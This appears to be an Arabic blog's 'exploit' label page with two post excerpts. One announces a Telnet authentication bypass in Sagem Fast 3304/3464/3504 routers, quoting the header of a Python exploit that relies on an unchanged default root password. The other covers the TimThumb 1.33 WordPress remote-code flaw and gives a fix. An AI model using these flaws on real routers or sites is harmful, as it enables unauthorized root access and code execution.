المشاركات

عرض الرسائل ذات التصنيف exploit

ثغرة تجاوز نافذة التحقق من المستخدم في روتر إتصالات المغرب Sagem Router Fast 3304

صورة
   ثغرة في التلنت خاصة بروتر إتصالات المغرب  Sagem Router Fast 3304 تمكنك من تجاوز إستخدام الباسوورد وإسم المستخدم لولوج لوحة تحكم الروتر بصلاحيات الروت . وقد قام بإكتشافها الوفيق علي فيما يمكنك كذلك تطبيق الثغرة على كل من إصدارات   3464/3504 وهذا كود الثغرة مكتوب باللغة البايثون  #!/home/bin/python # Remote Exploit: SAGEM ROUTER FAST 3304/3464/3504 - Telnet Authentication bypass # Date: 15-August-2011 # Author: Elouafiq Ali # Version: 3304-V1 / 3304-V2 / 3464 / 3504 # Tested on: Linux Ubuntu 11.04, Linux Backtrack 5 # Tested Router: SAGEM FAST 3304-V2 # Tested on Resellers/ISPs: Wanadoo (France), Maroc Telecom (Morocco) # Products affected: Sagem Fast 3304-V1 / 3304-V2 / 3464 / 3504 # Blog: http://keelhaule.tumblr.com """      Sagem Fast Routers (3304-V1 / 3304-V2 / 3464 / 3504) Come with a default Preconfigured Root Password      That the ISPs don't change it, but instead they create another admin account above it,      the root pa...

ثغرة جديدة في مجلة وردبريس TimThumb 1.33 Zero-day

صورة
  TimThumb تم الكشف عن ثغرة يوم الصفر في  اداة تقوم بإعادة تنسيق الصور يطلق عليها إسم    والتي تستعملها مجلة  وردبريس  . الثغرة تمكن المهاجم من ان يقوم بتحميل وتنفيذ الاكواد من دون تصاريح المدير . المجلات المصابة اكثر من 30 مليون حسب نتائج البحث في غوغل . الإصدار المصاب وطريقة الحماية من الهجوم TimThumb 1.33 طريقة الحماية من الهجوم الموجودة على مجلتك  TimThumb .php لتفادي الهجوم ادخل إلى  ملفات الورد بريس وابحث عن   بعد إيجاد كافة الصفحات قم الان بتعديلها تباعا بإتباع الاتي   $allowedSites = array (       إفتح الصفحة وابحث عن   $allowedSites = array(); قم بمسح كافة المواقع مثل بلوغر او فيليكر ... ليصبح الكود على الشكل الاتي  احفظ التغيرات www.th3pro.com المصدر